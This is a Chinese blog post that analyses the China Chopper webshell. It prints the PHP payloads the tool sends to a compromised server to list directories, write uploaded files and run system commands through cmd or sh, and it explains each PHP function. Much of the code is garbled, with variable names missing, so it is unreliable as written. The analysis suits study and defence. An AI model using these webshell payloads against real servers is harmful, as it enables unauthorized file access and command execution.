中国菜刀原理

一、自写脚本

@ini_set(“display_errors”,“0”);@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;print(“hello
PHP!”);;echo("|<-");die();

  1. 先用@ini_set(“display_errors”,“0”);临时关闭PHP的错误显示功能

  2. @set_time_limit(0);防止像dir、上传文件大马时超时

  3. @set_magic_quotes_runtime(0);关闭魔术引号,这东西在4.0以后就不怎么用了

  4. echo("->|");没啥好说的

  5. print(“hello PHP!”);输出字符串

  6. die();人如其名

二、文件管理

@ini_set(“display_errors”,“0”);@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;_POST[“z1”]);D);if(M=NULL;N=@readdir(M.F);};echo("|<-");die();&z1=C:\inetpub\wwwroot\

重点看:

_POST["z1"]);
D);
if(M=NULL;
    N=@readdir(M.F);
};
echo("|<-");
die();

opendir() 函数打开一个目录句柄,可由 closedir(),readdir() 和 rewinddir() 使用。

若成功,则该函数返回一个目录流,否则返回 false 以及一个 error。可以通过在函数名前加上 “@” 来隐藏 error 的输出。

readdir() 函数返回由 opendir() 打开的目录句柄中的条目。

若成功,则该函数返回一个文件名,否则返回 false。

fileperms() 函数返回文件或目录的权限。

若成功,则返回文件的访问权限。若失败,则返回 false。

base_convert() 函数在任意进制之间转换数字。

语法

base_convert(number,frombase,tobase)

filesize() 函数返回指定文件的大小。

若成功,则返回文件大小的字节数。若失败,则返回 false 并生成一条 E_WARNING 级的错误。

从代码可以清楚地看出,在接收z1=C:\inetpub\wwwroot\这个参数后,代码打开指定目录的句柄,然后进行循环扫描,并附带上权限、时间、大小、日期这四个参数,用\t制表符拼在一起捆绑发送回客户端,这是一种很常见的做法,将所有的需要的参数用一个定界符分开然后捆绑发送,到客户端怎么做呢?根据我自己的C变成经验,一定是用string_split之类的函数分开来,再循环一一显示在UI上,如果想要深究可以用IDA和OD逆向分析一下。

执行完这些代码之后,就完成了列目录的功能。

三、上传文件

@ini_set(“display_errors”,“0”);@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;_POST[“z1”]);_POST[“z2”];c);c);i=0;c);buf.=urldecode("%".substr(i,2));echo(@fwrite(fopen(buf)?“1”:“0”);;echo("|<-");die();

整理一下代码:

@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;
_POST["z1"]);
_POST["z2"];
c);
c);
i=0;c);buf.=urldecode("%".substr(i,2));
echo(@fwrite(fopen(buf)?"1":"0");;
echo("|<-");
die();
&z1=C:\\inetpub\\wwwroot\\1.png
&z2=.....................

代码基本上来说最关键的就是那个fwrite,就是将我们指定的装满数据的缓冲区写入我们指定的一个路径中。只要apache用户在当前目录下有写权限,php调用win api的时候就能完成写操作。

四、虚拟终端

@ini_set(“display_errors”,“0”);@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;_POST[“z1”]);_POST[“z2”]);_SERVER[“SCRIPT_FILENAME”]);d,0,1)=="/"?"-c
'{r="{r." 2>&1");;echo("|<-");die(); &z1=cmd &z2=cd /d
“C:\wamp\www”&dir&echo [S]&cd&echo [E]

整理一下代码:

@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;
_POST["z1"]);
_POST["z2"]);
_SERVER["SCRIPT_FILENAME"]);
d,0,1)=="/"?"-c '{r="{r." 2>&1");;
echo("|<-");
die();
&z1=cmd
&z2=cd /d "C:\wamp\www\"&dir&echo [S]&cd&echo [E]

dirname() 函数返回路径中的目录部分。

$_SERVER[“SCRIPT_FILENAME”]:

当前执行脚本的绝对路径。

如果在命令行界面(Command Line Interface, CLI)使用相对路径执行脚本,例如 file.php 或 …/file.php,那么$_SERVER[‘SCRIPT_FILENAME’] 将包含用户指定的相对路径。

substr() 函数返回字符串的一部分。

substr(string,start,length)

string system(string command, int [return_var]);

本函数就像是 C 语中的函数 system(),用来执行指令,并输出结果。若是 return_var 参数存在,则执行 command 之后的状态会填入 return_var 中。同样值得注意的是若需要处理用户输入的资料,而又要防止用户耍花招破解系统,则可以使用 EscapeShellCmd()。若 PHP 以模块式的执行,本函数会在每一行输出后自动更新 Web 服务器的输出缓冲暂存区。若需要完整的返回字符串,且不想经过不必要的其它中间的输出界面,可以使用 PassThru()。

如果return_val存在的话,那么执行的结果信息将被写入return_val中,@system($r." 2>&1");;我们都知道在C语言中,2代表错误输出流的意思,PHP是用C写的,当然也继承了这个特性,那这个意思就是执行系统命令,并屏蔽错误显示。

d,0,1)=="/" ? “-c '{s}”;

这是一个三元条件表达式,根据这个文件路径的第一个字符是否是"/"来决定命令的格式

因为linux下,所有的文件路径的第一个字符一定是"/",并且linux下的cmd命令的参数格式为-c

而windows下,所有文件路径的第一个字符串一定不是"/",并且windows下的cmd命令的参数格式为/c

这就是这个三目运算符的原因

posted on 2020-09-24 17:32  让编程成为一种习惯  阅读(636)  评论(0编辑  收藏  举报